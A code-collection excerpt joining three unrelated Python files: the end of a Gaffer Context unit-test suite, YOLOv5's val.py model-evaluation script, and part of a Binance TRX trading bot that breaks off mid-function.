self.assertEqual( c.substitute( r"\~" ), "~" )
self.assertEqual( c.substitute( r"\#\#\#\#" ), "####" )
# really we're passing \\ to substitute and getting back \ -
# the extra slashes are escaping for the python interpreter.
self.assertEqual( c.substitute( "\\\\" ), "\\" )
self.assertEqual( c.substitute( "\\" ), "" )
def testRemove( self ) :
c = Gaffer.Context()
c["a"] = "apple"
c["b"] = "bear"
c["c"] = "cat"
h = c.hash()
self.assertEqual( set( c.names() ), set( [ "a", "b", "c", "frame", "framesPerSecond" ] ) )
# test Context.remove()
c.remove( "a" )
self.assertNotEqual( c.hash(), h )
self.assertEqual( set( c.names() ), set( [ "b", "c", "frame", "framesPerSecond" ] ) )
h = c.hash()
# test Context.__delitem__()
del c[ "c" ]
self.assertNotEqual( c.hash(), h )
self.assertEqual( set( c.names() ), set( [ "b", "frame", "framesPerSecond" ] ) )
self.assertEqual( c["b"], "bear" )
def testRemoveMatching( self ) :
c = Gaffer.Context()
c["a_1"] = "apple"
c["a_2"] = "apple"
c["b_1"] = "bear"
c["b_2"] = "bear"
c["c_1"] = "cat"
c["c_2"] = "cat"
h = c.hash()
self.assertEqual( set( c.names() ), set( [ "a_1", "a_2", "b_1", "b_2", "c_1", "c_2", "frame", "framesPerSecond" ] ) )
# test Context.removeMatching()
c.removeMatching( "a* c*" )
self.assertNotEqual( c.hash(), h )
self.assertEqual( set( c.names() ), set( [ "b_1", "b_2", "frame", "framesPerSecond" ] ) )
h = c.hash()
def testContains( self ) :
c = Gaffer.Context()
self.assertFalse( "a" in c )
self.assertTrue( "a" not in c )
c["a"] = 1
self.assertTrue( "a" in c )
self.assertFalse( "a" not in c )
del c["a"]
self.assertFalse( "a" in c )
self.assertTrue( "a" not in c )
def testTime( self ) :
c = Gaffer.Context()
self.assertEqual( c.getFrame(), 1.0 )
self.assertEqual( c.getFramesPerSecond(), 24.0 )
self.assertAlmostEqual( c.getTime(), 1.0 / 24.0 )
c.setFrame( 12.0 )
self.assertEqual( c.getFrame(), 12.0 )
self.assertEqual( c.getFramesPerSecond(), 24.0 )
self.assertAlmostEqual( c.getTime(), 12.0 / 24.0 )
c.setFramesPerSecond( 48.0 )
self.assertEqual( c.getFrame(), 12.0 )
self.assertEqual( c.getFramesPerSecond(), 48.0 )
self.assertAlmostEqual( c.getTime(), 12.0 / 48.0 )
def testEditableScope( self ) :
GafferTest.testEditableScope()
def testCanceller( self ) :
c = Gaffer.Context()
c["test"] = 1
self.assertEqual( c.canceller(), None )
canceller = IECore.Canceller()
cc = Gaffer.Context( c, canceller )
self.assertEqual( cc["test"], 1 )
self.assertTrue( cc.canceller() is not None )
canceller.cancel()
with self.assertRaises( IECore.Cancelled ) :
IECore.Canceller.check( cc.canceller() )
if __name__ == "__main__":
unittest.main()
|
val.py
|
"""Validate a trained YOLOv5 model accuracy on a custom dataset
Usage:
$ python path/to/val.py --data coco128.yaml --weights yolov5s.pt --img 640
"""
import argparse
import json
import os
import sys
from pathlib import Path
from threading import Thread
import numpy as np
import torch
import yaml
from tqdm import tqdm
FILE = Path(__file__).absolute()
sys.path.append(FILE.parents[0].as_posix()) # add yolov5/ to path
from models.experimental import attempt_load
from .utils.datasets import create_dataloader
from .utils.general import coco80_to_coco91_class, check_dataset, check_file, check_img_size, check_requirements, \
box_iou, non_max_suppression, scale_coords, xyxy2xywh, xywh2xyxy, set_logging, increment_path, colorstr
from .utils.metrics import ap_per_class, ConfusionMatrix
from .utils.plots import plot_images, output_to_target, plot_study_txt
from .utils.torch_utils import select_device, time_sync
from .utils.loggers import Loggers
def save_one_txt(predn, save_conf, shape, file):
# Save one txt result
gn = torch.tensor(shape)[[1, 0, 1, 0]] # normalization gain whwh
for *xyxy, conf, cls in predn.tolist():
xywh = (xyxy2xywh(torch.tensor(xyxy).view(1, 4)) / gn).view(-1).tolist() # normalized xywh
line = (cls, *xywh, conf) if save_conf else (cls, *xywh) # label format
with open(file, 'a') as f:
f.write(('%g ' * len(line)).rstrip() % line + '\n')
def save_one_json(predn, jdict, path, class_map):
# Save one JSON result {"image_id": 42, "category_id": 18, "bbox": [258.15, 41.29, 348.26, 243.78], "score": 0.236}
image_id = int(path.stem) if path.stem.isnumeric() else path.stem
box = xyxy2xywh(predn[:, :4]) # xywh
box[:, :2] -= box[:, 2:] / 2 # xy center to top-left corner
for p, b in zip(predn.tolist(), box.tolist()):
jdict.append({'image_id': image_id,
'category_id': class_map[int(p[5])],
'bbox': [round(x, 3) for x in b],
'score': round(p[4], 5)})
def process_batch(predictions, labels, iouv):
# Evaluate 1 batch of predictions
correct = torch.zeros(predictions.shape[0], len(iouv), dtype=torch.bool, device=iouv.device)
detected = [] # label indices
tcls, pcls = labels[:, 0], predictions[:, 5]
nl = labels.shape[0] # number of labels
for cls in torch.unique(tcls):
ti = (cls == tcls).nonzero(as_tuple=False).view(-1) # label indices
pi = (cls == pcls).nonzero(as_tuple=False).view(-1) # prediction indices
if pi.shape[0]: # find detections
ious, i = box_iou(predictions[pi, 0:4], labels[ti, 1:5]).max(1) # best ious, indices
detected_set = set()
for j in (ious > iouv[0]).nonzero():
d = ti[i[j]] # detected label
if d.item() not in detected_set:
detected_set.add(d.item())
detected.append(d) # append detections
correct[pi[j]] = ious[j] > iouv # iou_thres is 1xn
if len(detected) == nl: # all labels already located in image
break
return correct
@torch.no_grad()
def run(data,
weights=None, # model.pt path(s)
batch_size=32, # batch size
imgsz=640, # inference size (pixels)
conf_thres=0.001, # confidence threshold
iou_thres=0.6, # NMS IoU threshold
task='val', # train, val, test, speed or study
device='', # cuda device, i.e. 0 or 0,1,2,3 or cpu
single_cls=False, # treat as single-class dataset
augment=False, # augmented inference
verbose=False, # verbose output
save_txt=False, # save results to *.txt
save_hybrid=False, # save label+prediction hybrid results to *.txt
save_conf=False, # save confidences in --save-txt labels
save_json=False, # save a COCO-JSON results file
project='runs/val', # save to project/name
name='exp', # save to project/name
exist_ok=False, # existing project/name ok, do not increment
half=True, # use FP16 half-precision inference
model=None,
dataloader=None,
save_dir=Path(''),
plots=True,
loggers=Loggers(),
compute_loss=None,
):
# Initialize/load model and set device
training = model is not None
if training: # called by train.py
device = next(model.parameters()).device # get model device
else: # called directly
device = select_device(device, batch_size=batch_size)
# Directories
save_dir = increment_path(Path(project) / name, exist_ok=exist_ok) # increment run
(save_dir / 'labels' if save_txt else save_dir).mkdir(parents=True, exist_ok=True) # make dir
# Load model
model = attempt_load(weights, map_location=device) # load FP32 model
gs = max(int(model.stride.max()), 32) # grid size (max stride)
imgsz = check_img_size(imgsz, s=gs) # check image size
# Multi-GPU disabled, incompatible with .half() https://github.com/ultralytics/yolov5/issues/99
# if device.type != 'cpu' and torch.cuda.device_count() > 1:
# model = nn.DataParallel(model)
# Data
with open(data) as f:
data = yaml.safe_load(f)
check_dataset(data) # check
# Half
half &= device.type != 'cpu' # half precision only supported on CUDA
if half:
model.half()
# Configure
model.eval()
is_coco = type(data['val']) is str and data['val'].endswith('coco/val2017.txt') # COCO dataset
nc = 1 if single_cls else int(data['nc']) # number of classes
iouv = torch.linspace(0.5, 0.95, 10).to(device) # iou vector for mAP@0.5:0.95
niou = iouv.numel()
# Dataloader
if not training:
if device.type != 'cpu':
model(torch.zeros(1, 3, imgsz, imgsz).to(device).type_as(next(model.parameters()))) # run once
task = task if task in ('train', 'val', 'test') else 'val' # path to train/val/test images
dataloader = create_dataloader(data[task], imgsz, batch_size, gs, single_cls, pad=0.5, rect=True,
prefix=colorstr(f'{task}: '))[0]
seen = 0
confusion_matrix = ConfusionMatrix(nc=nc)
names = {k: v for k, v in enumerate(model.names if hasattr(model, 'names') else model.module.names)}
class_map = coco80_to_coco91_class() if is_coco else list(range(1000))
s = ('%20s' + '%11s' * 6) % ('Class', 'Images', 'Labels', 'P', 'R', 'mAP@.5', 'mAP@.5:.95')
p, r, f1, mp, mr, map50, map, t0, t1, t2 = 0., 0., 0., 0., 0., 0., 0., 0., 0., 0.
loss = torch.zeros(3, device=device)
jdict, stats, ap, ap_class = [], [], [], []
for batch_i, (img, targets, paths, shapes) in enumerate(tqdm(dataloader, desc=s)):
t_ = time_sync()
img = img.to(device, non_blocking=True)
img = img.half() if half else img.float() # uint8 to fp16/32
img /= 255.0 # 0 - 255 to 0.0 - 1.0
targets = targets.to(device)
nb, _, height, width = img.shape # batch size, channels, height, width
t = time_sync()
t0 += t - t_
# Run model
out, train_out = model(img, augment=augment) # inference and training outputs
t1 += time_sync() - t
# Compute loss
if compute_loss:
loss += compute_loss([x.float() for x in train_out], targets)[1] # box, obj, cls
# Run NMS
targets[:, 2:] *= torch.Tensor([width, height, width, height]).to(device) # to pixels
lb = [targets[targets[:, 0] == i, 1:] for i in range(nb)] if save_hybrid else [] # for autolabelling
t = time_sync()
out = non_max_suppression(out, conf_thres, iou_thres, labels=lb, multi_label=True, agnostic=single_cls)
t2 += time_sync() - t
# Statistics per image
for si, pred in enumerate(out):
labels = targets[targets[:, 0] == si, 1:]
nl = len(labels)
tcls = labels[:, 0].tolist() if nl else [] # target class
path, shape = Path(paths[si]), shapes[si][0]
seen += 1
if len(pred) == 0:
if nl:
stats.append((torch.zeros(0, niou, dtype=torch.bool), torch.Tensor(), torch.Tensor(), tcls))
continue
# Predictions
if single_cls:
pred[:, 5] = 0
predn = pred.clone()
scale_coords(img[si].shape[1:], predn[:, :4], shape, shapes[si][1]) # native-space pred
# Evaluate
if nl:
tbox = xywh2xyxy(labels[:, 1:5]) # target boxes
scale_coords(img[si].shape[1:], tbox, shape, shapes[si][1]) # native-space labels
labelsn = torch.cat((labels[:, 0:1], tbox), 1) # native-space labels
correct = process_batch(predn, labelsn, iouv)
if plots:
confusion_matrix.process_batch(predn, labelsn)
else:
correct = torch.zeros(pred.shape[0], niou, dtype=torch.bool)
stats.append((correct.cpu(), pred[:, 4].cpu(), pred[:, 5].cpu(), tcls)) # (correct, conf, pcls, tcls)
# Save/log
if save_txt:
save_one_txt(predn, save_conf, shape, file=save_dir / 'labels' / (path.stem + '.txt'))
if save_json:
save_one_json(predn, jdict, path, class_map) # append to COCO-JSON dictionary
loggers.on_val_batch_end(pred, predn, path, names, img[si])
# Plot images
if plots and batch_i < 3:
f = save_dir / f'val_batch{batch_i}_labels.jpg' # labels
Thread(target=plot_images, args=(img, targets, paths, f, names), daemon=True).start()
f = save_dir / f'val_batch{batch_i}_pred.jpg' # predictions
Thread(target=plot_images, args=(img, output_to_target(out), paths, f, names), daemon=True).start()
# Compute statistics
stats = [np.concatenate(x, 0) for x in zip(*stats)] # to numpy
if len(stats) and stats[0].any():
p, r, ap, f1, ap_class = ap_per_class(*stats, plot=plots, save_dir=save_dir, names=names)
ap50, ap = ap[:, 0], ap.mean(1) # AP@0.5, AP@0.5:0.95
mp, mr, map50, map = p.mean(), r.mean(), ap50.mean(), ap.mean()
nt = np.bincount(stats[3].astype(np.int64), minlength=nc) # number of targets per class
else:
nt = torch.zeros(1)
# Print results
pf = '%20s' + '%11i' * 2 + '%11.3g' * 4 # print format
print(pf % ('all', seen, nt.sum(), mp, mr, map50, map))
# Print results per class
if (verbose or (nc < 50 and not training)) and nc > 1 and len(stats):
for i, c in enumerate(ap_class):
print(pf % (names[c], seen, nt[c], p[i], r[i], ap50[i], ap[i]))
# Print speeds
t = tuple(x / seen * 1E3 for x in (t0, t1, t2)) # speeds per image
if not training:
shape = (batch_size, 3, imgsz, imgsz)
print(f'Speed: %.1fms pre-process, %.1fms inference, %.1fms NMS per image at shape {shape}' % t)
# Plots
if plots:
confusion_matrix.plot(save_dir=save_dir, names=list(names.values()))
loggers.on_val_end()
# Save JSON
if save_json and len(jdict):
w = Path(weights[0] if isinstance(weights, list) else weights).stem if weights is not None else '' # weights
anno_json = str(Path(data.get('path', '../coco')) / 'annotations/instances_val2017.json') # annotations json
pred_json = str(save_dir / f"{w}_predictions.json") # predictions json
print(f'\nEvaluating pycocotools mAP... saving {pred_json}...')
with open(pred_json, 'w') as f:
json.dump(jdict, f)
try: # https://github.com/cocodataset/cocoapi/blob/master/PythonAPI/pycocoEvalDemo.ipynb
check_requirements(['pycocotools'])
from pycocotools.coco import COCO
from pycocotools.cocoeval import COCOeval
anno = COCO(anno_json) # init annotations api
pred = anno.loadRes(pred_json) # init predictions api
eval = COCOeval(anno, pred, 'bbox')
if is_coco:
eval.params.imgIds = [int(Path(x).stem) for x in dataloader.dataset.img_files] # image IDs to evaluate
eval.evaluate()
eval.accumulate()
eval.summarize()
map, map50 = eval.stats[:2] # update results (mAP@0.5:0.95, mAP@0.5)
except Exception as e:
print(f'pycocotools unable to run: {e}')
# Return results
model.float() # for training
if not training:
s = f"\n{len(list(save_dir.glob('labels/*.txt')))} labels saved to {save_dir / 'labels'}" if save_txt else ''
print(f"Results saved to {save_dir}{s}")
maps = np.zeros(nc) + map
for i, c in enumerate(ap_class):
maps[c] = ap[i]
return (mp, mr, map50, map, *(loss.cpu() / len(dataloader)).tolist()), maps, t
def parse_opt():
parser = argparse.ArgumentParser(prog='val.py')
parser.add_argument('--data', type=str, default='data/coco128.yaml', help='dataset.yaml path')
parser.add_argument('--weights', nargs='+', type=str, default='yolov5s.pt', help='model.pt path(s)')
parser.add_argument('--batch-size', type=int, default=32, help='batch size')
parser.add_argument('--imgsz', '--img', '--img-size', type=int, default=640, help='inference size (pixels)')
parser.add_argument('--conf-thres', type=float, default=0.001, help='confidence threshold')
parser.add_argument('--iou-thres', type=float, default=0.6, help='NMS IoU threshold')
parser.add_argument('--task', default='val', help='train, val, test, speed or study')
parser.add_argument('--device', default='', help='cuda device, i.e. 0 or 0,1,2,3 or cpu')
parser.add_argument('--single-cls', action='store_true', help='treat as single-class dataset')
parser.add_argument('--augment', action='store_true', help='augmented inference')
parser.add_argument('--verbose', action='store_true', help='report mAP by class')
parser.add_argument('--save-txt', action='store_true', help='save results to *.txt')
parser.add_argument('--save-hybrid', action='store_true', help='save label+prediction hybrid results to *.txt')
parser.add_argument('--save-conf', action='store_true', help='save confidences in --save-txt labels')
parser.add_argument('--save-json', action='store_true', help='save a COCO-JSON results file')
parser.add_argument('--project', default='runs/val', help='save to project/name')
parser.add_argument('--name', default='exp', help='save to project/name')
parser.add_argument('--exist-ok', action='store_true', help='existing project/name ok, do not increment')
parser.add_argument('--half', action='store_true', help='use FP16 half-precision inference')
opt = parser.parse_args()
opt.save_json |= opt.data.endswith('coco.yaml')
opt.save_txt |= opt.save_hybrid
opt.data = check_file(opt.data) # check file
return opt
def main(opt):
set_logging()
print(colorstr('val: ') + ', '.join(f'{k}={v}' for k, v in vars(opt).items()))
check_requirements(exclude=('tensorboard', 'thop'))
if opt.task in ('train', 'val', 'test'): # run normally
run(**vars(opt))
elif opt.task == 'speed': # speed benchmarks
for w in opt.weights if isinstance(opt.weights, list) else [opt.weights]:
run(opt.data, weights=w, batch_size=opt.batch_size, imgsz=opt.imgsz, conf_thres=.25, iou_thres=.45,
save_json=False, plots=False)
elif opt.task == 'study': # run over a range of settings and save/plot
# python val.py --task study --data coco.yaml --iou 0.7 --weights yolov5s.pt yolov5m.pt yolov5l.pt yolov5x.pt
x = list(range(256, 1536 + 128, 128)) # x axis (image sizes)
for w in opt.weights if isinstance(opt.weights, list) else [opt.weights]:
f = f'study_{Path(opt.data).stem}_{Path(w).stem}.txt' # filename to save to
y = [] # y axis
for i in x: # img-size
print(f'\nRunning {f} point {i}...')
r, _, t = run(opt.data, weights=w, batch_size=opt.batch_size, imgsz=i, conf_thres=opt.conf_thres,
iou_thres=opt.iou_thres, save_json=opt.save_json, plots=False)
y.append(r + t) # results and times
np.savetxt(f, y, fmt='%10.4g') # save
os.system('zip -r study.zip study_*.txt')
plot_study_txt(x=x) # plot
if __name__ == "__main__":
opt = parse_opt()
main(opt)
|
sltrx.py
|
import os
import math
import sys
import telegram_send
import threading
import importlib
import glob
from colorama import init
init()
from binance.client import Client
from binance.exceptions import BinanceAPIException
from requests.exceptions import ReadTimeout, ConnectionError
from datetime import date, datetime, timedelta
import time
from itertools import count
import json
from helpers.parameters import (
parse_args, load_config
)
from helpers.handle_creds import (
load_correct_creds, test_api_key
)
class txcolors:
BUY = '\033[92m'
WARNING = '\033[93m'
SELL_LOSS = '\033[91m'
SELL_PROFIT = '\033[32m'
DIM = '\033[2m\033[35m'
DEFAULT = '\033[39m'
# tracks profit/loss each session
global session_profit
session_profit = 0
# print with timestamps
old_out = sys.stdout
class St_ampe_dOut:
"""Stamped stdout."""
nl = True
def write(self, x):
"""Write function overloaded."""
if x == '\n':
old_out.write(x)
self.nl = True
elif self.nl:
old_out.write(f'{txcolors.DIM}[{str(datetime.now().replace(microsecond=0))}]{txcolors.DEFAULT} {x}')
self.nl = False
else:
old_out.write(x)
def flush(self):
pass
sys.stdout = St_ampe_dOut()
def get_price(add_to_historical=True):
'''Return the current price for all coins on binance'''
global historical_prices, hsp_head
initial_price = {}
prices = client.get_all_tickers()
for coin in prices:
if CUSTOM_LIST:
if any(item + PAIR_WITH == coin['symbol'] for item in tickers) and all(item not in coin['symbol'] for item in FIATS):
initial_price[coin['symbol']] = { 'price': coin['price'], 'time': datetime.now()}
else:
if PAIR_WITH in coin['symbol'] and all(item not in coin['symbol'] for item in FIATS):
initial_price[coin['symbol']] = { 'price': coin['price'], 'time': datetime.now()}
if add_to_historical:
hsp_head += 1
if hsp_head == RECHECK_INTERVAL:
hsp_head = 0
historical_prices[hsp_head] = initial_price
return initial_price
def wait_for_price():
'''calls the initial price and ensures the correct amount of time has passed
before reading the current price again'''
global historical_prices, hsp_head, volatility_cooloff
volatile_coins = {}
externals = {}
coins_up = 0
coins_down = 0
coins_unchanged = 0
pause_bot()
if historical_prices[hsp_head]['TRX' + PAIR_WITH]['time'] > datetime.now() - timedelta(minutes=float(TIME_DIFFERENCE / RECHECK_INTERVAL)):
# sleep for exactly the amount of time required
time.sleep((timedelta(minutes=float(TIME_DIFFERENCE / RECHECK_INTERVAL)) - (datetime.now() - historical_prices[hsp_head]['TRX' + PAIR_WITH]['time'])).total_seconds())
print(f'Working...Session profit:{session_profit:.2f}% ')
# retreive latest prices
get_price()
# calculate the difference in prices
for coin in historical_prices[hsp_head]:
# minimum and maximum prices over time period
min_price = min(historical_prices, key = lambda x: float("inf") if x is None else float(x[coin]['price']))
max_price = max(historical_prices, key = lambda x: -1 if x is None else float(x[coin]['price']))
threshold_check = (-1.0 if min_price[coin]['time'] > max_price[coin]['time'] else 1.0) * (float(max_price[coin]['price']) - float(min_price[coin]['price'])) / float(min_price[coin]['price']) * 100
# each coin with higher gains than our CHANGE_IN_PRICE is added to the volatile_coins dict if less than MAX_COINS is not reached.
if threshold_check < CHANGE_IN_PRICE:
coins_up +=1
if coin not in volatility_cooloff:
volatility_cooloff[coin] = datetime.now() - timedelta(minutes=TIME_DIFFERENCE)
# only include coin as volatile if it hasn't been picked up in the last TIME_DIFFERENCE minutes already
if datetime.now() >= volatility_cooloff[coin] + timedelta(minutes=TIME_DIFFERENCE):
volatility_cooloff[coin] = datetime.now()
if len(coins_bought) + len(volatile_coins) < MAX_COINS or MAX_COINS == 0:
volatile_coins[coin] = round(threshold_check, 3)
print(f'{coin} has gained - {volatile_coins[coin]}% within the last {TIME_DIFFERENCE} minutes, calculating volume in {PAIR_WITH}')
else:
print(f'{txcolors.WARNING}{coin} has gained - {round(threshold_check, 3)}% within the last {TIME_DIFFERENCE} minutes, but you are holding max number of coins{txcolors.DEFAULT}')
elif threshold_check > CHANGE_IN_PRICE:
coins_down +=1
else:
coins_unchanged +=1
# Here goes new code for external signalling
externals = external_signals()
exnumber = 0
for excoin in externals:
if excoin not in volatile_coins and excoin not in coins_bought and \
(len(coins_bought) + exnumber + len(volatile_coins)) < MAX_COINS:
volatile_coins[excoin] = 1
exnumber +=1
print(f'External signal received on {excoin}, calculating volume in {PAIR_WITH}')
return volatile_coins, len(volatile_coins), historical_prices[hsp_head]
def external_signals():
external_list = {}
signals = {}
# check directory and load pairs from files into external_list
signals = glob.glob("signals/*.exs")
for filename in signals:
for line in open(filename):
symbol = line.strip()
external_list[symbol] = symbol
try:
os.remove(filename)
except:
if DEBUG: print(f'{txcolors.WARNING}Could not remove external signalling file{txcolors.DEFAULT}')
return external_list
def pause_bot():
'''Pause the script when exeternal indicators detect a bearish trend in the market'''
global bot_paused, session_profit, hsp_head
# start counting for how long the bot's been paused
start_time = time.perf_counter()
while os.path.isfile("signals/paused.exc"):
if bot_paused == False:
print(f'{txcolors.WARNING}Pausing buying due to change in market conditions, stop loss and take profit will continue to work...{txcolors.DEFAULT}')
bot_paused = True
# Sell function needs to work even while paused
coins_sold = sell_coins()
remove_from_portfolio(coins_sold)
get_price(True)
# pausing here
if hsp_head == 1: print(f'Paused...Session profit:{session_profit:.2f}% Est:${(QUANTITY * session_profit)/100:.2f}')
time.sleep((TIME_DIFFERENCE * 60) / RECHECK_INTERVAL)
else:
# stop counting the pause time
stop_time = time.perf_counter()
time_elapsed = timedelta(seconds=int(stop_time-start_time))
# resume the bot and ser pause_bot to False
if bot_paused == True:
print(f'{txcolors.WARNING}Resuming buying due to change in market conditions, total sleep time: {time_elapsed}{txcolors.DEFAULT}')
bot_paused = False
return
def convert_volume():
'''Converts the volume in free USDT to the coin's volume'''
volatile_coins, number_of_coins, last_price = wait_for_price()
lot_size = {}
volume = {}
for coin in volatile_coins:
# Find the correct step size for each coin
# max accuracy for BTC for example is 6 decimal points
# while XRP is only 1
try:
info = client.get_symbol_info(coin)
step_size = info['filters'][2]['stepSize']
lot_size[coin] = step_size.index('1') - 1
if lot_size[coin] < 0:
lot_size[coin] = 0
except:
pass
# new code 50% vom balance free
free_balance = client.get_asset_balance(asset='USDT')
free = math.floor(float(free_balance['free']) *0.9)
# calculate the volume in coin from QUANTITY in USDT (default)
volume[coin] = float(free / float(last_price[coin]['price']))
# define the volume with the correct step size
if coin not in lot_size:
volume[coin] = float('{:.1f}'.format(volume[coin]))
else:
# if lot size has 0 decimal points, make the volume an integer
if lot_size[coin] == 0:
volume[coin] = int(volume[coin])
else:
volume[coin] = float('{:.{}f}'.format(volume[coin], lot_size[coin]))
return volume, last_price
def buy():
'''Place Buy market orders for each volatile coin found'''
LastPricea = client.get_symbol_ticker(symbol='TRXUSDT')
lastpriceb = LastPricea['price']
volume, last_price = convert_volume()
orders = {}
LastPricea = client.get_symbol_ticker(symbol='TRXUSDT')
current = LastPricea['price']
currentprice = float(current)
currentprice_str = str(current)
LastPriceb = client.get_symbol_ticker(symbol='TRXUSDT')
currentpriceb = LastPriceb['price']
max = str(currentpriceb)
with open('current_price.txt', 'r') as file:
btccurrent = file.readlines()[-1]
lastcurrent = btccurrent.strip('\n').strip(' ')
iscurrent = float(lastcurrent)
with open('lastsell.txt', 'r') as file:
lastline = file.readlines()[-1]
lastsell = lastline.strip('\n').strip(' ')
last_sell = float(lastsell)
if current != iscurrent:
with open('current_price.txt', 'w') as filehandle:
for listitem in currentprice_str:
filehandle.write('%s' % listitem)
with open('maxprice.txt', 'r') as file:
btcbuy = file.readlines()[-1]
lastb = btcbuy.strip('\n').strip(' ')
maxpricec = float(lastb)
if currentprice >= maxpricec :
with open('maxprice.txt', 'w') as filehandle:
for listitem in max:
filehandle.write('%s' % listitem)
with open('maxprice.txt', 'r') as file:
btcbuy = file.readlines()[-1]
lastb = btcbuy.strip('\n').strip(' ')
maxpricea = float(lastb)
# Hier neuer bear code
with open('lastsell.txt', 'r') as file:
sellline = file.readlines()[-1]
lastsell = sellline.strip('\n').strip(' ')
last_sell = float(lastsell)
if currentprice <= last_sell :
with open('lastsell.txt', 'w') as filehandle:
for listitem in max:
filehandle.write('%s' % listitem)
with open('lastsell.txt', 'r') as file:
sellline = file.readlines()[-1]
lastsell = sellline.strip('\n').strip(' ')
last_sell = float(lastsell)
with open('lastsellstatic.txt', 'r') as file:
selllinestat = file.readlines()[-1]
lastsellstat = selllinestat.strip('\n').strip(' ')
last_sell_static = float(lastsellstat)
with open('pricechange.txt', 'r') as file:
changeline = file.readlines()[-1]
changeitem = changeline.strip('\n').strip(' ')
price_change = float(changeitem)
for coin in volume:
# only buy if the there are no active trades on the coin
if coin not in coins_bought and price_change <= (-0.9) and currentprice >= last_sell * 1.007:
print(f"{txcolors.BUY}Preparing to buy {volume[coin]} {coin}{txcolors.DEFAULT}")
if TEST_MODE:
orders[coin] = [{
'symbol': coin,
'orderId': 0,
'time': datetime.now().timestamp()
}]
# Log trade
if LOG_TRADES:
write_log(f"Buy : {volume[coin]} {coin} - {last_price[coin]['price']}")
continue
# try to create a real order if the test orders did not raise an exception
try:
buy_limit = client.create_order(
symbol = coin,
side = 'BUY',
type = 'MARKET',
quantity = volume[coin]
)
# error handling here in case position cannot be placed
except Exception as e:
print(e)
# run the else block if the position has been placed and return order info
else:
orders[coin] = client.get_all_orders(symbol=coin, limit=1)
# binance sometimes returns an empty list, the code will wait here until binance returns the order
while orders[coin] == []:
print('Binance is being slow in returning the order, calling the API again...')
orders[coin] = client.get_all_orders(symbol=coin, limit=1)
time.sleep(1)
else:
print('Order returned, saving order to file')
boughtat_a = client.get_symbol_ticker(symbol='TRXUSDT')
boughtat = boughtat_a['price']
boughtsafe = str(boughtat)
rest = str('0')
# Log trade
if LOG_TRADES:
write_log(f"I just bought: {volume[coin]} {coin} @ {last_price[coin]['price']}")
# reset maxprice for this buy so it will also work in more bearish trends
newprice = last_price[coin]['price']
newpricea = str(newprice)
with open('maxprice.txt', 'w') as filehandle:
for listitem in boughtsafe:
filehandle.write('%s' % listitem)
#read trade log and send info to telegram bot
with open('trades.txt', 'r') as file:
logline = file.readlines()[-1]
lastlogbuy = logline.strip('\n').strip(' ')
telebuy = str(lastlogbuy)
telegram_send.send(messages=[telebuy])
elif (coin not in coins_bought and price_change >= (-0.9) and float(lastpriceb) >= last_sell_static and maxpricea >= last_sell_static * 1.0007 and currentprice <= maxpricea and currentprice >= maxpricea * 0.9996) or (coin not in coins_bought and price_change >= (-0.9) and last_sell_static >= currentprice and currentprice >= last_sell_static * 0.99 and currentprice >= last_sell * 1.0012) or (coin not in coins_bought and price_change >= (-0.9) and currentprice <= last_sell_static * 0.99 and currentprice >= last_sell * 1.007) :
print(f"{txcolors.BUY}Preparing to buy {volume[coin]} {coin}{txcolors.DEFAULT}")
if TEST_MODE:
orders[coin] = [{
'symbol': coin,
'orderId': 0,
'time': datetime.now().timestamp()
}]
# Log trade
if LOG_TRADES:
write_log(f"Buy : {volume[coin]} {coin} - {last_price[coin]['price']}")
continue
# try to create a real order if the test orders did not raise an exception
try:
buy_limit = client.create_order(
symbol = coin,
side = 'BUY',
type = 'MARKET',
quantity = volume[coin]
)
# error handling here in case position cannot be placed
except Exception as e:
print(e)
# run the else block if the position has been placed and return order info
else:
orders[coin] = client.get_all_orders(symbol=coin, limit=1)
# binance sometimes returns an empty list, the code will wait here until binance returns the order
while orders[coin] == []:
print('Binance is being slow in returning the order, calling the API again...')
orders[coin] = client.get_all_orders(symbol=coin, limit=1)
time.sleep(1)
else:
print('Order returned, saving order to file')
boughtat_a = client.get_symbol_ticker(symbol='TRXUSDT')
boughtat = boughtat_a['price']
boughtsafe = str(boughtat)
rest = str('0')
# Log trade
if LOG_TRADES:
write_log(f"I just bought: {volume[coin]} {coin} @ {last_price[coin]['price']}")
# reset maxprice for this buy so it will also work in more bearish trends
newprice = last_price[coin]['price']
newpricea = str(newprice)
with open('maxprice.txt', 'w') as filehandle:
for listitem in boughtsafe:
filehandle.write('%s' % listitem)
#read trade log and send info to telegram bot
with open('trades.txt', 'r') as file:
logline = file.readlines()[-1]
lastlogbuy = logline.strip('\n').strip(' ')
telebuy = str(lastlogbuy)
telegram_send.send(messages=[telebuy])
else:
print(f'Signal detected, but there is already an active trade on {coin}, or buy parameters are not met')
return orders, last_price, volume
def sell_coins():
'''sell coins that have reached the STOP LOSS or TAKE PROFIT threshold'''
global hsp_head, session_profit
last_price = get_price(False) # don't populate rolling window
last_price = get_price(add_to_historical=True) # don't populate rolling window
coins_sold = {}
for coin in list(coins_bought):
LastPrice = float(last_price[coin]['price'])
BuyPrice = float(coins_bought[coin]['bought_at'])
sell = str(LastPrice)
PriceChange = float((LastPrice - BuyPrice) / BuyPrice * 100)
with open('current_price.txt', 'w') as filehandle:
for listitem in sell:
filehandle.write('%s' % listitem)
with open('maxprice.txt', 'r') as file:
btcbuy = file.readlines()[-1]
lastb = btcbuy.strip('\n').strip(' ')
maxpricea = float(lastb)
time.sleep(5)
if LastPrice >= maxpricea :
with open('maxprice.txt', 'w') as filehandle:
for listitem in sell:
filehandle.write('%s' % listitem)
if (LastPrice <= (maxpricea * 0.9996) and LastPrice >= (BuyPrice * 1.0016)) or (LastPrice <= BuyPrice * 0.991 ):
print(f"{txcolors.SELL_PROFIT if PriceChange >= 0. else txcolors.SELL_LOSS}Sell criteria reached, selling {coins_bought[coin]['volume']} {coin} - {BuyPrice} - {LastPrice} : {PriceChange-(TRADING_FEE*2):.2f}% Est:${(QUANTITY*(PriceChange-(TRADING_FEE*2)))/100:.2f}{txcolors.DEFAULT}")
# try to create a real order
try:
if not TEST_MODE:
sell_coins_limit = client.create_order(
symbol = coin,
side = 'SELL',
type = 'MARKET',
quantity = coins_bought[coin]['volume']
)
# error handling here in case position cannot be placed
except Exception as e:
print(e)
# run the else block if coin has been sold and create a dict for each coin sold
else:
coins_sold[coin] = coins_bought[coin]
# prevent system from buying this coin for the next TIME_DIFFERENCE minutes
volatility_cooloff[coin] = datetime.now()
# Log trade
if LOG_TRADES:
profit = ((LastPrice - BuyPrice) * coins_sold[coin]['volume'])* (1-(TRADING_FEE*2)) # adjust for trading fee here
